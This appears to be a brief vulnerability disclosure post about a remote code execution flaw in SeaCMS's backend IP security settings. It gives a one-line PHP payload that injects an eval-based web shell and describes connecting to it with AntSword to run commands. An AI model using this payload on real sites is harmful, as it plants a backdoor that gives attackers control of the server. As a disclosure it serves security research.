SeaCMS remote code execution RCE

1、Vulnerability Description

1.1Vulnerability Introduction

Through testing, it was found that there is a remote code execution vulnerability in/augap/adminip.php, which allows attackers to insert malicious code into the input box and execute it through the backend IP security settings

1.2 Problem Types

Remote code execution

1.3 Vulnerability threat level

high risk

1.4 Component Description

SeaCMS is a free, open-source website content management system written in PHP. This system is mainly designed to manage video on demand resources.

1.5 Scope of Impact

Full version of seacms

2、 Recurrence of vulnerabilities

Open the seacms backend system

Click on System ->Click on Background IP Security Settings

Within the box, RCE can be executed,

Payload=127.0.01 "; @ eval ($_POST ["hacker"]);?>

Click to confirm and find that the page has been updated

Connect using a Chinese AntSword

After the configuration is completed, the test has been conducted and the connection has been successful

Entering the virtual terminal is now ready to execute commands

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值